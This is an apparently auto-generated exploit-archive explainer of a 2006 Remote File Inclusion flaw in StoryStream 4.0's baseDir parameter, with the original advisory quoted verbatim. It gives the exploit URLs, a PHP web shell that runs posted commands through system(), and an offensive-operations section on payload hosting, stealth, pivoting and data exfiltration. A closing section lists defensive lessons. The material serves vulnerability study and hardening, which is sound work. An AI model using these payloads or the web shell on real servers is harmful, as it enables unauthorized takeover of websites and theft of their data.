By exploitdb papers bot•November 12, 2006•
papers
StoryStream 4.0 Remote File Inclusion Explained
StoryStream 4.0 Remote File Inclusion Explained
What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in StoryStream version 4.0. The author, v1per-haCker, demonstrates how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server, effectively taking control of the vulnerable web application.
Simple technical breakdown
StoryStream 4.0 is a web application. Like many web applications, it uses PHP to dynamically generate web pages. PHP has a function called include (and similar ones like require) that allows a script to pull in and execute code from another file.
The vulnerability lies in how StoryStream handles user-supplied input for a parameter named baseDir. Instead of validating this input properly, the application directly uses it in an include statement. If an attacker provides a URL pointing to a malicious PHP file on a server they control, the StoryStream application will download and execute that file as if it were part of its own code. This is the essence of Remote File Inclusion.
Complete code and payload walkthrough
The provided text is a proof-of-concept announcement and exploit demonstration, not a full code listing of the vulnerable application or a complex exploit script. However, it clearly shows the exploit vector and the target.
Exploit URL Structure:
http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?
http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?Let's break down the components:
http://localhost/path/include/classes/pear/DB/mysql.phporhttp://localhost/path/include/classes/pear/DB/mysqli.php: This is the vulnerable script within the StoryStream application. It appears to be related to database connection classes, likely using the PEAR DB library. The exact path might vary depending on the installation.?: This is the standard query string separator in URLs.baseDir=: This is the vulnerable parameter. The application expects a directory path here.http://EvElCoDe.txt: This is the attacker-controlled URL. The attacker would host a file namedEvElCoDe.txt(or any other name) on their own web server. This file would contain the malicious PHP code they want to execute on the victim's server. The.txtextension is often used to bypass simple file type filters, but since it's being included by PHP'sincludefunction, the server interprets it as PHP code regardless of the extension.?: The second question mark is unusual. In standard URL parsing, it signifies the start of a new query parameter. However, in this context, it's likely intended to terminate thebaseDirparameter value and potentially prevent further processing or parsing issues on the vulnerable server, or it might be part of the attacker's payload withinEvElCoDe.txtitself if they were trying to pass arguments to their included script. Without the content ofEvElCoDe.txt, its exact purpose is unknown, but it's part of the exploit string.
Mapping list:
baseDirparameter: The input point for the RFI vulnerability.http://EvElCoDe.txt: The remote URL containing the attacker's payload.- The vulnerable PHP script (
mysql.phpormysqli.php): The target script that processes thebaseDirparameter unsafely.
Payload (Conceptual):
The content of http://EvElCoDe.txt would be PHP code. A common payload for RFI would be a simple web shell, allowing the attacker to execute commands on the server.
Example EvElCoDe.txt content (not provided in the paper, but typical for RFI):
<?php
// Simple web shell
echo "<form method='post' action=''><input type='text' name='cmd'><input type='submit' name='submit' value='Run'></form>";
if(isset($_POST['cmd'])) {
system($_POST['cmd']);
}
?>When the vulnerable StoryStream script includes http://EvElCoDe.txt, the PHP interpreter on the victim's server would execute this code. The attacker would then be able to submit commands through a web form displayed on the victim's site.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The vulnerability is exposed via a GET request to a public-facing URL.
- Lab Preconditions:
- A target web server running StoryStream version 4.0 (or a version with the same vulnerability).
- A separate attacker-controlled web server to host the malicious payload file (
EvElCoDe.txt). This server must be accessible from the target server. - A local machine to craft and send the exploit request.
- Tooling Assumptions:
- A web browser for manual testing and verification.
- A command-line tool like
curlorwgetfor sending crafted HTTP requests. - A simple HTTP server (e.g., Python's
http.server,apache,nginx) on the attacker's machine to serve the payload.
- Execution Pitfalls:
- Firewall/Network Restrictions: The target server might not be able to reach the attacker's server due to outbound firewall rules.
- Web Application Firewalls (WAFs): Modern WAFs may detect and block requests containing suspicious URLs or patterns indicative of RFI.
- PHP Configuration (
allow_url_fopen,allow_url_include): The target server's PHP configuration must haveallow_url_fopenenabled forincludeto fetch remote files.allow_url_includewould also need to be enabled forincludeto execute remote PHP files, thoughallow_url_fopenis the primary enabler for fetching. If these are disabled, the exploit will fail. - File Extension/Content Filtering: While the paper uses
.txt, some applications might have stricter filters. The attacker might need to experiment with different extensions or obfuscation techniques. - Path Traversal/Sanitization: If the application had any basic sanitization (e.g., removing
http://), the exploit would fail. This paper implies a lack of such sanitization. - Payload Complexity: The attacker's payload needs to be compatible with the target environment and the PHP version.
- URL Encoding: Special characters in the payload URL might need URL encoding.
- Tradecraft Considerations:
- Reconnaissance: Identify the exact path to the vulnerable script and the
baseDirparameter. This might involve directory brute-forcing or examining the application's source code if available. - Payload Hosting: Ensure the payload server is stable and accessible. Consider using a domain that doesn't immediately raise suspicion.
- Stealth: Avoid overly noisy payloads. A simple web shell is often sufficient. Be mindful of the telemetry generated by the target server (e.g., outbound connection logs).
- Post-Exploitation: Once a web shell is achieved, the attacker can use it to download further tools, pivot to other systems, or exfiltrate data.
- Reconnaissance: Identify the exact path to the vulnerable script and the
Where this was used and when
- Application: StoryStream version 4.0.
- Year: Published in November 2006. This indicates the vulnerability was active around this time.
- Context: Web applications, specifically PHP-based ones, were common targets for RFI vulnerabilities in the mid-2000s. This exploit targets a specific version of a downloadable script.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. All external data, especially parameters used in file operations or dynamic code execution, must be rigorously validated and sanitized.
- Principle of Least Privilege: Ensure web server processes run with the minimum necessary privileges.
- Disable Dangerous PHP Configurations:
allow_url_fopenshould generally be disabled unless absolutely necessary for specific, controlled functionalities.allow_url_includeshould always be disabled.
- Use Secure Coding Practices: Developers should be trained to avoid functions like
include,require,eval,system,execwith untrusted input. Prefer safer alternatives or implement strict validation. - Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attack patterns, including RFI attempts. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software updated to patch known vulnerabilities. StoryStream 4.0 is very old, but the principle applies to any software.
- Code Auditing: Regularly audit application code for security flaws, especially around input handling and file operations.
ASCII visual (if applicable)
+-----------------+ +---------------------+ +---------------------+
| Attacker's | | Internet/Network | | Victim's Web Server |
| Machine |----->| |----->| (StoryStream v4.0) |
| (Crafts Request)| | | | |
+-----------------+ +---------------------+ +----------+----------+
|
| (Vulnerable Script)
| baseDir=http://attacker.com/payload.php
|
v
+---------------------+
| Attacker's Payload |
| Server |
| (Hosts payload.php) |
+---------------------+
^
| (HTTP Request)
|
+---------------------+
| PHP Interpreter |
| on Victim's Server |
| (Executes payload) |
+---------------------+Explanation:
- The attacker crafts an HTTP request targeting a vulnerable script on the victim's web server.
- The request includes a
baseDirparameter pointing to a URL on the attacker's own server. - The victim's web server, running StoryStream, receives the request.
- The vulnerable script within StoryStream uses the
baseDirparameter in anincludestatement. - The victim's web server makes an HTTP request to the attacker's server to fetch the file specified by
baseDir. - The attacker's server responds with the malicious PHP payload.
- The victim's PHP interpreter then executes the downloaded payload, granting the attacker control.
Source references
- Paper ID: 2767
- Paper Title: StoryStream 4.0 - 'baseDir' Remote File Inclusion
- Author: v1per-haCker
- Published: 2006-11-12
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2767
- Raw URL: https://www.exploit-db.com/raw/2767
Original Exploit-DB Content (Verbatim)
#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:- #
# #
# Scripts: Storystream #
# download : http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip #
# Version : 4 #
# Dork & vuln : download script and think :) #
# #
#=======================================================================================#
# Exploit : #
# #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt? #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt? #
# #
#=======================================================================================#
# Discoverd By : v1per-haCker #
# #
# Conatact : v1per-hacker[at]hotmail.com #
# #
# XP10_hackEr Team >> www.xp10.com #
# SpeciaL PoweR SecuritY TeaM >> www.specialpower.org #
# #
# Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL | #
# | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB | #
# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota | #
# | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO | #
# | MuhaciR |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi | #
# #
# Thanks >> /str0ke & www.milw0rm.com & www.google.com #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################
# milw0rm.com [2006-11-12]